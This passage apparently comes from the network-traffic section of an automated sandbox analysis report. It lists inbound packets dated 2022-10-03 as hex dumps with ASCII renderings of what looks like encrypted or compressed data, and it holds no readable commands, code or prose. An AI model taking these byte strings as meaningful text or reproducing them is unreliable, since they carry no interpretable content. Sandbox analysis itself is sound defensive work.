a2 4b 2b 20 52 2c 9a 6d b1 88 ef Data Ascii: mZpZo9j96\|:8iq.w_nsl?E+MID8Ko}@"%?aj7{UreQ)j'9/15)N2QJ%&,)i~BA\|YGB)8`et`0]Lv)nzZun)pfHgmZdN=DCrJlh99)Fv/XK+ R,m
2022-10-03 14:13:31 UTC	180	IN	Data Raw: e3 c8 dd 0c b5 93 1a fc 5b e1 04 62 b9 55 2f 63 1c ce 7a 20 47 f8 75 d8 b2 d4 b5 09 ae 19 56 10 21 9e 7a d7 2b dd 27 92 d0 fb fe ba f9 57 f6 ec bb cd 64 94 26 85 a9 ca 65 1a 94 ec 5f 18 c7 e9 8b 7b 6b 83 35 95 66 63 72 81 38 d6 3b 94 5c 3b fe 8b d5 d9 d9 6e 60 2a 7e b4 cf 13 13 b5 43 ec 96 68 ab 77 ea ee 0e 39 8c 9c fa 7b 81 2c 51 b3 bf 53 30 64 69 05 b2 6b 62 9a 6c 9c df 50 0d 6f c7 20 46 13 f1 19 2c 76 00 50 e5 b3 55 db 69 c5 2d 39 c6 67 be 8c 05 65 b3 d5 06 51 82 63 c5 70 5d bf e9 b1 2b 74 73 b1 fc 92 2d 71 d6 b0 a6 14 8b 8c 9a 18 cf ef b6 2e 39 58 49 d2 03 a3 35 a8 36 8c 93 67 e9 48 7d 29 fc b1 ad dc d2 5d 88 e7 5a bb 6d 7d fb 92 28 b7 ff 87 8c c5 df 5f 2b 71 fb 5d 4f 8e 45 43 ad 78 a1 b9 4d fd 4b be 77 dd 37 ba e0 04 96 af 14 a2 d2 35 55 60 bc a8 f5 Data Ascii: [bU/cz GuV!z+'Wd&e_{k5fcr8;\;n`*~Chw9{,QS0dikblPo F,vPUi-9geQcp]+ts-q.9XI56gH})]Zm}(_+q]OECxMKw75U`
2022-10-03 14:13:31 UTC	181	IN	Data Raw: 17 06 f0 85 ce 82 84 c3 bd ad 57 8c d2 14 7a 06 24 dd 8b 72 69 8c eb bb 96 36 6b 63 55 cc 95 94 f2 3d 57 06 4b ce 4d 0f 77 7c d3 f5 db 93 51 3e 0c ea 0e 1c a0 40 c7 53 2f 58 de 87 4d e6 ce 40 ab fa aa 69 26 0a 7b be 36 7c 49 ac 2d 16 13 a0 f3 f0 21 f9 44 73 cc 2e 10 9c 16 00 90 90 f5 0f 92 76 bd ae df 73 63 15 6e 62 ad 9c 2d 5d 46 50 bc 29 5d d1 18 df 44 e2 04 1d 93 8d ab 7d e6 b6 1f 4b 01 8a 7f 7f 98 20 f8 2d 83 eb 01 20 09 26 de 4a 88 b8 8b 54 78 77 79 af 14 70 b9 0c cb 93 84 de 72 74 8b cc 29 b1 3b 35 e8 96 15 8f 29 ed 08 1a f7 ab 21 60 e8 2b 0e 4e 04 01 c5 aa d6 aa 51 9d 48 ad 64 24 b9 0c 2b 69 69 3d b9 6b 44 11 17 f4 99 28 5a de 80 d1 43 6d 8a 88 a2 68 d0 e9 8e 67 15 f7 74 aa 9f 2e e1 55 32 2d 17 c8 0d 82 76 09 6d ec 5a 4a 03 fb c5 25 6e c5 49 3c 71 Data Ascii: Wz$ri6kcU=WKMw\|Q>@S/XM@i&{6\|I-!Ds.vscnb-]FP)]D}K - &JTxwyprt);5)!`+NQHd$+ii=kD(ZCmhgt.U2-vmZJ%nI<q
2022-10-03 14:13:31 UTC	183	IN	Data Raw: b5 b6 c4 9a 6d e4 45 aa b5 f3 8c 59 74 33 7d 80 46 16 e2 69 7e c6 b9 99 95 df 3b ca 33 64 84 d7 4f 20 97 7e 32 99 16 d0 00 1e 28 61 d5 cb e1 0d 9e 5b 65 d6 c4 af f5 db 2d b7 33 82 ef b5 fe 33 3b c8 46 5e 1e 1c 95 5b 06 d1 c1 3b be ad 16 e5 30 3f b0 43 ee 20 a7 ee 77 30 08 13 a9 82 82 6e 57 ff 6e f4 12 04 81 13 d0 11 dc d8 0a b3 1f 94 b7 7e b0 55 a0 ef b2 79 41 65 dc 9c ee 67 7f 39 8f af cf d5 2d cb d0 87 6e ce e3 62 73 7c 6d 52 d3 9e cf 74 b5 e7 da 94 6b ea 8a 15 85 1e f5 18 91 bf ee 01 fa e0 83 14 a6 6d 59 24 aa 3b 0f 5a d7 8d 53 5f e2 c5 71 44 48 46 c8 2f 49 37 86 bd 69 f0 e7 69 63 23 2a 50 e6 07 d9 14 22 e7 54 c7 35 89 a3 c5 f9 c9 a6 ef 4a 1a 87 23 87 0d d1 2a f0 d4 b4 25 45 71 23 ad 45 87 b9 b4 91 3b cc 56 c4 90 32 9f f2 22 9d c3 ee cc 5f 68 69 f9 40 Data Ascii: mEYt3}Fi~;3dO ~2(a[e-33;F^[;0?C w0nWn~UyAeg9-nbs\|mRtkmY$;ZS_qDHF/I7iic#P"T5J#%Eq#E;V2"_hi@
2022-10-03 14:13:31 UTC	184	IN	Data Raw: ba 9e d7 3c 5c a6 7a c5 c5 71 ff 39 74 87 07 f8 0e 89 b5 70 44 b7 17 2a cb 4e 29 87 ae 34 43 ef 34 8f ef a4 95 a1 89 73 b9 87 9e 4d 8f 2c 80 d0 18 a9 fd 45 6c 19 f7 f0 87 4c 88 be bb 88 f4 26 9f 72 1d 7d 7e 36 a6 1f c3 6b f7 cd f1 ca d7 a8 30 41 73 96 cd 61 66 1c c2 7e ad 18 54 b5 37 d1 9c da 7b cb 94 e1 16 3a 54 eb cf c7 76 2d 99 d9 3e d8 3f 5a 11 80 11 f6 a8 01 8f 6b 52 3a ad dd ae 2c 41 27 63 a3 f4 7b 6a 4e b2 cc 04 94 75 7b 78 17 c1 86 f6 9e af bc b0 1e 44 71 5c 6d 7a 8e 65 31 31 45 f6 a4 42 46 20 1d 79 4a f1 14 71 92 f0 82 53 f7 97 1a f1 01 a4 62 5e 9d 19 f9 18 8e 32 00 86 29 15 cc 33 8b b2 86 07 65 0e 7a 56 18 23 a4 75 c9 bf 89 8d 6f 85 89 c9 26 0e 28 c4 ed 84 03 f7 34 84 08 41 d6 2b 3c 31 ec ed 17 c5 19 c8 c1 a4 da 9f 51 e1 4a ee 45 bb b9 a8 29 3d Data Ascii: <\zq9tpD*N)4C4sM,ElL&r}~6k0Asaf~T7{:Tv->?ZkR:,A'c{jNu{xDq\mze11EBF yJqSb^2)3ezV#uo&(4A+<1QJE)=
2022-10-03 14:13:31 UTC	185	IN	Data Raw: c2 1b f5 08 33 c9 ca 75 b3 e1 a2 e9 01 86 4e 9c ec 17 41 03 96 5f 04 0e 3c ec b9 57 2d 1f fd 0b fe 63 ac 1f 5f 93 84 42 fa 81 32 d9 ac 06 6f e0 6c 3f 7b c9 95 ed e9 0c d7 fd 83 21 17 4c fe b2 e8 24 8c 95 92 01 f6 8e 36 a6 d4 73 50 dc da d0 1b 9b 33 96 86 8d 6b 04 26 21 10 ed 22 b0 41 3a 7d d9 ec a1 54 20 22 67 f8 31 e2 85 64 1d 7e 95 4d fe 92 e9 7f 7d 38 53 e5 3e 4a d3 a3 23 b1 ec a3 c0 76 d6 1b 03 c4 48 b8 10 7a bf ff d7 e0 f6 df b6 d7 e2 b6 f6 b8 76 9d f5 29 cc 43 b8 83 87 0d ca 15 4e cf f8 b3 18 90 ee 4b 45 5a 80 b5 bf 21 2c 19 80 b1 f5 54 98 18 3e 06 af d2 c0 cf 22 21 0b 15 ad 4d 12 ca b7 e6 ee 2a 68 36 22 b1 fa 1a 38 ca b6 a5 7d 58 2e 0b 97 a4 00 2e 65 2a 24 78 75 18 b7 0d b7 fd 4e 56 23 15 0a f9 10 be 1a aa 7d 1f 50 6c b0 e4 b5 c6 db dc 3a 2d 4e 2b Data Ascii: 3uNA_<W-c_B2ol?{!L$6sP3k&!"A:}T "g1d~M}8S>J#vHzv)CNKEZ!,T>"!Mh6"8}X..e$xuNV#}Pl:-N+
2022-10-03 14:13:31 UTC	186	IN	Data Raw: e1 8c a0 ba f2 d3 eb e5 d1 cd c0 76 f7 50 f4 ad 71 af db 38 8a 70 82 92 7d 66 4d 76 04 f4 24 28 5c 0c 20 63 57 3b 21 b2 00 1d 4b c3 1e 5d f9 c9 0a e7 bc 39 15 aa 3b dc 21 15 ef b2 61 97 57 ec b5 34 60 52 de ce 19 f5 90 60 96 83 e4 a3 a6 e0 9f 65 fe 8b 00 c5 ab 14 7f 7d 57 b5 6d 46 a8 3d a7 75 2e 25 fa 5b ed de 44 68 39 04 b0 95 50 82 86 c5 c2 bf 0f 8c 4a 4e 93 02 2c dd 21 70 2f 91 d6 b9 86 34 e9 2b 5f cc d1 96 2b 2d 35 02 36 ce ef 01 9c 24 9d f7 8f 83 cf 3e bd f5 62 0e f8 40 96 08 73 48 d6 87 83 e4 b7 4a 96 f8 a6 6b 62 43 71 be 56 7e b7 bc 30 08 42 a0 ce e0 61 a0 2e 71 be 3e 89 84 1b 23 1c 99 ad 0f e6 74 57 aa 1a 6e 0b 07 29 62 a5 9c 41 4f 05 40 b4 29 cd c3 53 cf 4c e2 90 0f 60 83 a3 7d 7e a4 4a 5b 09 8a e3 6d e5 30 f0 2d 13 e9 81 30 20 3f 86 59 37 a8 8e Data Ascii: vPq8p}fMv$(\ cW;!K]9;!aW4`R`e}WmF=u.%[Dh9PJN,!p/4+_+-56$>b@sHJkbCqV~0Ba.q>#tWn)bAO@)SL`}~J[m0-0 ?Y7
2022-10-03 14:13:31 UTC	188	IN	Data Raw: ea ce f5 21 d4 10 cd 51 d8 4c 77 3d 8f 43 61 e1 a2 0d f0 63 00 e0 ad b8 4d a5 ad f5 f2 79 7b 77 7c 53 31 65 d2 6b b2 82 d6 04 d9 d8 80 42 da 0c bd 6a ab ab 46 8a 49 f5 8a 19 53 82 bd 60 c5 52 7c d4 49 fc 84 b0 0e 76 27 0c 16 f5 b2 4c 1b 6e 53 df 0e 4d 08 b1 4b f3 7c 7d f9 33 d0 a5 27 7f 38 eb f2 30 ee b6 19 42 a1 cb 94 a5 8d 8c 5f fd 2b b6 7a ea ce 59 5e 2f 0b 99 b8 2f 3b 75 ab de 4f 88 a3 c7 45 d2 31 73 23 ce 61 38 c7 73 1a 83 bc cb d8 0a 47 7b 6e d3 db 1e a1 43 dd cf 34 af b2 c3 58 a9 16 90 4f a9 2f 2d 51 f4 34 43 8e 03 b9 64 95 cf f6 26 96 98 ab fa a8 22 99 4b 15 01 b5 cc 80 34 9e 32 09 a0 1e 6a f0 da 66 d7 8a 0c 46 36 3c 32 50 d8 d9 91 4b b4 a3 7d 6f 73 28 cf 70 7d 00 46 39 bd f2 53 be 1c be 89 e9 d0 92 ef 52 a1 c7 e6 66 47 41 5b 18 7c af bb 78 53 14 Data Ascii: !QLw=CacMy{w\|S1ekBjFIS`R\|Iv'LnSMK\|}3'80B_+zY^//;uOE1s#a8sG{nC4XO/-Q4Cd&"K42jfF6<2PK}os(p}F9SRfGA[\|xS
2022-10-03 14:13:31 UTC	189	IN	Data Raw: 3e f3 ae 57 4d db e0 d5 2e 93 b8 58 22 9c b7 a7 26 30 65 28 26 61 af 1f 4c cd ac 1c 7e 67 d9 2e 02 3a 94 d4 ae 9f 60 fe b9 19 92 0c e6 e7 69 3b c6 62 e7 ba 85 ef 6e ab f4 ce d8 ff ac de 20 d2 50 eb 42 fc e9 64 41 c1 3b a4 7a 97 3f 99 74 45 1b 1d f1 ba 21 52 0d 39 63 79 20 28 b3 3c 1c 0e c3 17 5d b9 58 84 ee b5 3d 51 ab 9a d5 28 15 a7 b3 c7 9e 50 ed 39 ee 84 5c d9 ce 89 fe 75 6e 9f 83 2c a2 4d e4 96 65 32 80 ed e2 a5 14 af 7c a5 bf 65 46 8c 3f 4c 71 26 25 d2 59 a8 df 4c 80 31 06 f0 85 58 86 b2 c7 88 af 07 8c 72 4c 78 06 24 dc 1d af 72 91 de b9 c6 32 a9 3b 57 cc 95 94 64 3d 3d 02 7e c6 1d 10 80 24 d1 f5 db 97 c7 3e ed f7 3b 1e f0 40 c2 0a 2d 52 de 78 f3 e6 5a 44 9e fc fa 69 01 53 79 be 36 7c df ac 38 02 26 c1 8d f0 69 a0 46 77 cc 2e 81 84 77 21 16 90 a5 0f Data Ascii: >WM.X"&0e(&aL~g.:`i;bn PBdA;z?tE!R9cy (<]X=Q(P9\un,Me2\|eF?Lq&%YL1XrLx$r2;Wd==~$>;@-RxZDiSy6\|8&iFw.w!
2022-10-03 14:13:31 UTC	190	IN	Data Raw: b6 77 0f 16 ab 08 b6 60 95 1c 64 46 6e 08 29 7f 6a 2e 07 4d b8 08 cb a3 25 2c 39 6f 7d ba 48 99 f3 75 32 7e 7e a1 9a c7 0f bd 46 7a 38 c8 2b e1 ca d9 b8 92 09 92 84 37 2f 3b 5b 62 19 59 42 a4 68 22 1b e5 f1 14 58 18 11 bb f0 fd ec 18 d0 8c e4 17 2d e9 00 87 42 9d 31 30 38 02 93 be 50 e3 8e 99 50 29 58 58 3e fd b8 5f df 3a ae 4e 0a ad d7 54 11 a7 46 8a 86 81 8c cf a5 76 25 02 7f 1c e0 69 1f c1 39 1d c9 5c 1c 13 e3 30 e5 5e 2c 81 63 07 b3 c2 2e f8 b5 45 26 85 e6 3f 37 8f dc 8a f5 2d ff be ea 44 e9 44 94 e9 41 45 70 84 c3 55 37 cb 25 87 83 3b 91 99 96 c2 8d db 6a d0 9f ae 69 50 6a 40 d1 e7 b3 e8 10 58 29 f4 ad f4 05 44 10 44 b2 64 b3 e3 97 0c f7 da 8c bf fc c7 75 29 e9 10 17 2f 58 87 7a 67 98 f8 71 94 87 b1 80 7d 62 14 07 53 68 d7 ec b6 5d f6 70 d9 80 98 03 Data Ascii: w`dFn)j.M%,9o}Hu2~~Fz8+7/;[bYBh"X-B108PP)XX>_:NTFv%i9\0^,c.E&?7-DDAEpU7%;jiPj@X)DDdu)/Xzgq}bSh]p
2022-10-03 14:13:31 UTC	191	IN	Data Raw: 1a ce 86 0a f9 40 33 ba f6 28 f3 0d 87 21 a0 ea 1b 1f 71 d7 77 4d c6 21 43 5c 1d 0d e0 31 9b 1b f9 9f e7 62 d3 8e 60 6f d8 7c c8 95 52 64 04 43 94 98 4f a5 7b cc 94 ce 57 49 bf 19 84 cf d2 df 3d 12 ee 7a df 1e 79 61 67 15 05 50 4c a8 81 cc 1c 69 0e 38 4a a5 77 90 98 82 ff 91 ff 63 54 96 6f 82 e6 2f 5d ee 68 be f2 80 df c8 c9 d4 83 b5 9a 88 df 9f b8 1d a8 2c 9d c8 09 e3 a3 5f e9 17 f2 f7 c0 11 20 02 43 b9 5b 52 26 41 56 06 10 47 41 d7 58 1c 7d a6 63 02 f5 a9 e5 9a f8 56 35 c2 fc bc 4d 71 a7 c0 a2 ea 0f a9 57 54 e0 30 bc aa 89 93 10 1a c0 c1 55 d6 28 97 c2 17 53 e4 9e ad c7 66 dd 19 c1 bb 04 22 e8 60 09 1d 47 55 a1 3c cc de 05 1b 57 7f 80 e4 2b f1 d7 a3 88 c8 62 f8 2d 00 19 75 50 9c 7e 11 0f e2 ad dc a2 36 da 5e 23 93 d9 f5 17 49 7c 61 1d a9 6e 7c f1 40 d1 Data Ascii: @3(!qwM!C\1b`o\|RdCO{WI=zyagPLi8JwcTo/]h,_ C[R&AVGAX}cV5MqWT0U(Sf"`GU<W+b-uP~6^#I\|an\|@
2022-10-03 14:13:31 UTC	193	IN	Data Raw: 14 10 63 78 97 fe 5b 2a 90 e1 bc 27 4d e9 ed d6 37 82 bb e5 03 60 94 00 c4 ff 43 84 55 75 68 61 98 7f ed 15 4c 1d 9f 3f 39 41 a2 8d 44 03 a0 49 5b 15 12 fe 2b 80 12 29 26 c4 3c 8b 2e b3 35 01 0e 79 71 3d 6e 7b 1c 6f 6c af 11 84 9a 05 05 5c 0e 7f c8 45 b0 b5 7f 1a 1b 4e 8c f7 c7 4b e9 4f 78 51 c3 0a b5 e1 f1 dd d1 08 f3 b4 17 7b 17 73 07 5f 5b 27 97 61 43 20 d4 a6 07 74 6c 16 aa 99 f3 cc 18 e7 ac 90 3e 09 9a 12 95 30 93 00 55 2e 2d fe 98 16 b0 af ab 13 1e 7b 39 0c d2 d7 76 cd 53 8b 6d 0a 8b f4 20 3f 80 35 9d 81 e2 8b ec d6 60 37 6b 74 3f e0 5d 3c b5 37 3b ba 6b 1a 70 c4 12 96 68 3f e8 48 25 b3 ca 07 9d fd 50 43 85 c5 73 3c a6 b9 e9 f3 5d eb 9c 84 45 e2 2d 9c cb 41 75 45 ed f5 78 7b e1 03 e2 c7 14 f4 a8 81 8c ae e4 26 fe b9 cb 21 5b 05 4c fb 8e bf c5 10 77 Data Ascii: cx[*'M7`CUuhaL?9ADI[+)&<.5yq=n{ol\ENKOxQ{s_['aC tl>0U.-{9vSm ?5`7kt?]<7;kph?H%PCs<]E-AuEx{&![Lw
2022-10-03 14:13:31 UTC	193	IN	Data Raw: 85 7f 44 3c 9f f3 af 94 33 26 eb 8c 9f 69 49 36 15 ce 7d 19 a6 db 57 7a 42 e3 d7 84 1b c9 24 06 b8 4b 81 c3 12 4f 73 e2 c4 7b f7 12 ff c1 76 0b 32 71 18 10 c4 fe 48 39 20 50 f9 4d 24 b5 73 ad 06 90 7b 7a e1 ec c9 11 93 e7 6a 3f 73 e3 0d 1a ed 45 f8 6e ec 86 56 49 56 56 ac 36 ef f9 ff 20 1a 0e 19 da 60 15 a9 5a a1 ff e1 9f 16 10 fa a5 4b c4 5f 40 ec c5 61 ee 57 99 6c 68 93 e6 5e 14 98 47 6b 0f 60 65 b3 c3 b4 df 27 f8 4a e5 0d 40 df 61 46 0d 1c 51 dc 05 21 7c 72 b5 ef 5c 2b b7 e2 a4 36 28 8e cc c7 0e b3 bc e6 13 43 96 18 ff fb 6f 95 21 40 64 77 bd 79 e7 76 6d 0b 8e 2f 2d 64 be b1 76 1a a0 39 48 18 14 d5 37 95 1f 0b 26 df 3c 9b 02 a7 2c 01 0e 6e 6d 2c 6f 79 16 24 50 82 0c ce b3 09 06 78 7a 4d c8 43 bf 86 62 13 7e 5b 96 e9 c7 26 df 4c 47 7e c6 03 84 de f9 ca Data Ascii: D<3&iI6}WzB$KOs{v2qH9 PM$s{zj?sEnVIVV6 `ZK_@aWlh^Gk`e'J@aFQ!\|r\+6(Co!@dwyvm/-dv9H7&<,nm,oy$PxzMCb~[&LG~
2022-10-03 14:13:31 UTC	195	IN	Data Raw: 84 b8 64 b5 f4 e9 88 ea 97 50 13 9a 22 31 5d 7a 86 1b 53 b9 f8 7a b2 ea a6 90 7d 58 1d 35 63 49 9e aa bb 61 85 7a 90 cd 9a 3e 9e fb 30 93 98 72 88 6f f4 70 f2 8d ab d1 3a f3 bc 3e 6c 39 e9 aa 35 2a c7 10 f9 f2 7f 11 f5 50 d6 ea f1 80 6a ae e4 f5 89 a2 57 0a 2a 39 d1 2d 55 f1 f2 12 8b b4 38 f1 4e 80 ee 69 5c 6e c3 4d 17 d0 5a 69 b3 85 7b 46 3b 25 60 4a 0c 48 de 59 cd ea 24 3e 47 ab 47 32 7b 67 7e 4e 04 6a 11 da dd 80 f3 05 b1 61 5c 3e 00 71 c8 30 14 86 a1 9a 5f ef 0d b1 15 a5 cb 8b d2 70 11 57 d9 19 98 4a 05 81 d9 5e 70 1a d5 fb 7f e7 9b fc 05 55 3f 3d ba 95 e6 f3 cd 70 d9 aa 13 a6 06 2c 5d 9d c3 4f af f0 32 c9 8d 0a dc 41 47 a6 df 47 d9 1d ef 64 86 83 5d 38 18 90 57 24 8e 00 2a 3b 3e 10 bf 3f 96 1b f6 93 93 54 d3 e0 66 69 af 4b c9 e7 53 6c 60 76 8f f7 4a Data Ascii: dP"1]zSz}X5cIaz>0rop:>l95PjW9-U8Ni\nMZi{F;%`JHY$>GG2{g~Nja\>q0_pWJ^pU?=p,]O2AGGd]8W$*;>?TfiKSl`vJ
2022-10-03 14:13:31 UTC	196	IN	Data Raw: 59 a5 f6 3d f0 e6 a8 e3 ca 69 8c 01 29 0c 59 71 ae 78 00 3e fe b5 dc a8 36 e5 52 24 b8 f0 fa 64 5b 53 02 2d b5 6e 7b f1 49 ff b6 b4 fe b7 51 83 92 55 6a bd 2f a6 6f 41 76 9a e2 a8 8f 3d 2a 9e b5 93 07 01 10 11 df 58 1b ba ef 54 61 56 c0 cc 91 1b c4 05 1b ad 47 ef 84 24 44 73 fb ea 7d fb 11 d5 c0 12 24 1c 6c 02 62 ca f9 49 12 0a 03 ea 4c 3f b2 75 b0 2a e2 73 68 e6 d2 fd 18 84 d5 77 24 6f 8a 1c 0a ed 7f ae 48 f1 98 69 4f 4b 3f 9c 2e e6 ff ee 20 3e 02 09 dc 7d 1f c7 1c 8b fc ea a8 07 16 fb a5 46 df 2b 76 95 e5 61 ea 54 d3 44 55 d9 e8 5e 1d 9d 59 6b 3d 67 78 ae c4 d6 cd 36 e9 15 ec 14 54 d6 45 4a 08 1d 54 d6 25 40 76 72 80 c4 64 36 bd e1 a5 2b 22 e0 88 f1 11 a1 bd ef 0a 5c 99 12 e5 ec 43 80 21 5b 62 7b c8 69 e7 05 5d 07 82 3b 3e 6a b4 ad 25 3d bc 3a 68 15 0b Data Ascii: Y=i)Yqx>6R$d[S-n{IQUj/oAv=XTaVG$Ds}$lbIL?ushw$oHiOK?. >}F+vaTDU^Yk=gx6TEJT%@vrd6+"\C![b{i];>j%=:h
2022-10-03 14:13:31 UTC	197	IN	Data Raw: d7 5f ed 90 89 44 fe 36 9d d8 28 46 52 f6 81 50 73 bd 2e f5 be 03 e5 b3 8d a7 b9 e5 03 f4 b2 fe 53 77 1c 48 fd 82 a3 a0 42 75 26 b7 bb c5 75 55 37 17 b1 5e c5 ed bc 69 e5 e1 e3 8a dc a3 54 12 e9 01 2c 46 6e a2 1f 64 94 ab 7a af fe a6 91 66 6e 30 26 66 48 fd 89 87 66 99 64 f9 e4 9e 38 f6 b9 14 84 95 5d b9 54 fd 7c f4 9c 8b df 31 f9 9e 36 6c 39 84 bd 22 31 f7 0c f1 fb 5d 70 c3 7b a4 d4 e4 80 71 bb ec eb 98 af 44 0d 58 17 c0 31 7e ce ec 19 98 af 0c f5 48 e8 a7 48 56 68 f1 7b 0a e4 5c 6e c5 8b 7a 57 16 69 56 50 19 55 d8 3e dc fa 39 1e 46 a0 52 46 40 17 7c 48 19 54 3e f3 dc 98 f2 0e b7 2d 7e 35 13 41 c5 53 08 87 b0 b7 1c c5 0d a6 1f af da b5 b7 4d 13 57 f3 6c b9 49 14 a4 b0 63 71 07 d4 c6 79 fa bf df 09 55 2c 04 b3 fb c2 fa cc 71 8e 97 08 87 68 0b 4c 9b d4 49 Data Ascii: _D6(FRPs.SwHBu&uU7^iT,Fndzfn0&fHfd8]T\|16l9"1]p{qDX1~HHVh{\nzWiVPU>9FRF@\|HT>-~5ASMWlIcqyU,qhLI
2022-10-03 14:13:31 UTC	199	IN	Data Raw: f6 b0 69 61 d3 c1 ae fc 25 98 5c 46 82 0f bc ba c8 80 01 1c f6 e1 59 d6 28 97 96 37 54 e9 df f3 9b 2c eb 19 d7 d2 13 23 ce 46 38 14 55 25 80 3c c9 ba 0d 04 79 44 89 f1 3d f1 b2 80 ed db 46 e8 16 3e 1d 75 57 9f 64 06 0f e2 de fe a3 42 eb 42 23 a9 e6 94 03 58 49 5d 28 ad 71 7a f1 57 d1 93 a8 93 94 51 8e 9c 5e 6a b6 2c a3 6d 5e 58 8d f3 a9 8f 34 23 ed f8 a9 06 62 38 1c ca 77 0f a6 c2 5b 4d 50 c7 cd 84 28 d2 21 00 cc 6b ed e5 07 52 73 f4 e0 79 f7 18 c8 ef 60 09 00 05 0b 07 d9 c3 69 24 26 3b cf 29 04 82 6e ba 20 87 7a 79 fb ec c7 0e f6 c1 7b 3f 5e c9 1d 0a fd 45 96 59 ea 8a 6c 53 25 4c ab 2e d5 fb f9 31 0c 02 15 db 7d 11 c5 6f c8 f4 e1 aa 3d 20 ed aa 48 c4 47 51 af e4 70 eb 5c 93 79 73 96 c7 42 70 9e 4e 7a 11 41 62 a4 ee b3 cc 32 e8 26 d9 27 56 df 48 4c 07 1d Data Ascii: ia%\FY(7T,#F8U%<yD=F>uWdBB#XI](qzWQ^j,m^X4#b8w[MP(!kRsy`i$&;)n zy{?^EYlS%L.1}o= HGQp\ysBpNzAb2&'VHL
2022-10-03 14:13:31 UTC	200	IN	Data Raw: 3a ab 7b 6d 8e fe 2c 21 84 35 9c ac f5 e8 fa c0 67 3c 57 6a 3f 92 4f 3e a4 15 2e c9 48 3e 71 e4 1b 8c 7e 05 f5 25 13 de f1 19 bb 91 6b 43 8a d5 3f 06 b1 af 9d d7 40 b5 b4 8b 4f cf 23 97 c3 24 4c 43 84 d9 70 5b cd 01 e2 aa 16 ff a8 de 83 bf e7 0b f4 bf c3 44 76 1e 21 dc 89 a7 c9 62 54 0f 99 ac d2 71 21 00 29 b8 68 dc e7 aa 61 d0 fd f8 fc d2 a2 45 3f b9 34 2c 4a 70 ba 7a 67 b4 8c 69 bc f5 b3 8b 7d 3d 32 31 64 7e dd 99 a5 66 93 7c e4 80 b2 1a b3 95 33 a6 83 44 a3 63 91 74 e2 8d 95 ff 39 f5 8d 33 5d 3f 8d bd 3f 37 ef 11 95 f9 4a 04 de 7b b9 d8 fa 80 3e ac ec f1 86 97 4a 01 41 3d db 2c 7d ea 9e 31 8b b2 2b f8 5b 9a ad 61 4c 74 e8 1a 3b da 4a 40 d0 81 7b 42 10 69 47 41 0c 55 d8 18 fd ec 35 02 56 c5 62 05 61 1e 69 5f 34 50 31 c7 ca 84 e2 6b 87 6e 4b 29 17 71 e5 Data Ascii: :{m,!5g<Wj?O>.H>q~%kC?@O#$LCp[Dv!bTq!)haE?4,Jpzgi}=21d~f\|3Dct93]??7J{>JA=,}1+[aLt;J@{BiGAU5Vbai_4P1knK)q
2022-10-03 14:13:31 UTC	201	IN	Data Raw: fc a8 f7 97 be 8b 85 af a1 a8 77 87 26 85 ad 27 c2 ad 52 e3 33 f8 e3 b9 76 22 13 68 aa 6e 4e 26 6d 55 32 11 58 5b db 5f 7d 62 8e 72 30 d6 ba ef ee f6 4b 34 ca ee b0 6c 7c d5 d6 a4 ea 3f 9e 40 35 e5 39 ad 91 db 91 12 07 ec f7 5e db 4d 83 f3 11 6d c9 8c bb c3 77 c6 08 dc bb 34 33 ed 53 25 05 5f 25 bd 29 f7 9b 3d 1d 74 6a 99 f1 21 82 dd b7 d7 e6 69 e9 03 39 19 6a 4d a9 64 72 39 e8 ad cd a3 5b 87 68 32 af e0 e6 0d 49 44 02 37 bf 53 7a f8 48 9e 87 9e fe b7 4a 94 f7 79 5d 82 39 b2 7e 6a 3d aa d7 a9 89 2a 21 ec 8c 83 69 43 10 0b c7 46 08 8c c9 4c 58 54 cd d3 95 1b d4 3f 73 bf 4b f5 db 27 53 79 e8 dc 0f db 21 d9 cc 42 1c 1c 7d 15 62 ee f0 54 3d 27 3f dd 5b 29 91 6e b0 3c 9b 14 4b fb e1 ce 2e 8f d5 6a 2e 6c da 1d 00 e1 59 f8 6a e6 9f 50 52 4a 47 b7 5a d8 dd ec 3d Data Ascii: w&'R3v"hnN&mU2X[_}br0K4l\|?@59^Mmw43S%_%)=tj!i9jMdr9[h2ID7SzHJy]9~j=*!iCFLXT?sK'Sy!B}bT='?[)n<K.j.lYjPRJGZ=
2022-10-03 14:13:31 UTC	202	IN	Data Raw: c1 60 ae 72 03 6c 59 09 50 63 f0 23 5d a9 d1 75 08 09 f3 1b f1 8d a9 10 a1 d8 64 97 69 fb e7 ce 44 fa 76 3e 74 59 9d f8 36 e2 cb cc 50 6f 3e 58 7a be 98 18 84 29 e6 03 0a cd 90 41 61 61 9b e8 d2 00 e4 9f a2 15 71 82 f4 48 61 02 4c d0 fb bf c8 0d da 1f af 66 65 d2 76 8f 23 60 b2 97 e9 15 f3 0f 21 e1 b3 bf 98 d5 d9 e1 a3 ad 52 e4 e4 24 8e 45 f3 b3 44 06 30 8b 8f 13 2a 8d 7f 07 32 7d 83 5c 02 d0 f3 9d 78 17 26 bc a1 e1 78 a1 68 f5 51 5d 02 bb f4 e5 49 75 18 2f 5c 44 d5 22 bb 82 df 0d a7 12 8d f2 b3 e7 30 61 fb d4 5b 2a 1e ce 68 a1 dc fe 19 dc 86 c4 64 04 39 75 55 11 29 9a cc d6 15 fc 17 b0 80 e9 ca 07 fc 77 f5 ed 30 c8 1f 99 16 a7 f9 d8 33 af 90 cc 5e 19 43 69 1c 56 7e 80 64 84 1f 3a 75 81 3a d7 a5 9a d6 39 c0 9b 04 c0 d1 a2 7f 38 ff 95 4b 92 bb 8c f7 cf d4 Data Ascii: `rlYPc#]udiDv>tY6Po>Xz)AaaqHaLfev#`!R$ED02}\x&xhQ]Iu/\D"0a[hd9uU)w03^CiV~d:u:98K
2022-10-03 14:13:31 UTC	204	IN	Data Raw: 30 a4 5f 06 d2 6a d7 ac 3d 75 45 6f 95 3e a1 53 1f 69 20 6d 63 3e 1e cf e7 af 19 33 64 42 27 cc 16 b0 d6 e3 96 fd fb 21 31 98 04 e3 c6 6e 2b 08 45 eb ba c0 ef 94 2a 8b f2 d5 f6 e2 d7 d0 d4 75 de 50 f4 bf e5 43 d0 b1 1d 74 97 92 d8 7e 41 76 1d fb 33 25 5a 0c 2b 22 7a 27 3a fe 3f 1a 1c 93 13 50 b9 c8 96 ea b5 38 51 ab 9e d4 29 15 a7 b7 c3 9f 50 ec 3d 30 83 5c d9 cd 8f e6 21 66 9f 87 24 aa 5f b0 8e 6d 35 8a e9 c3 aa 1c b7 64 a1 bb 64 44 84 3b 4c 70 3e 2b d9 59 aa cc ce 51 07 84 c9 97 da bb b7 c7 89 ae 15 c0 77 4c 79 07 36 8d 12 75 62 99 cf fd de 24 e5 2a 13 dd d1 86 34 35 38 02 7c ce 05 17 92 24 d3 e9 c3 81 f2 3a ed f6 33 06 f6 60 c1 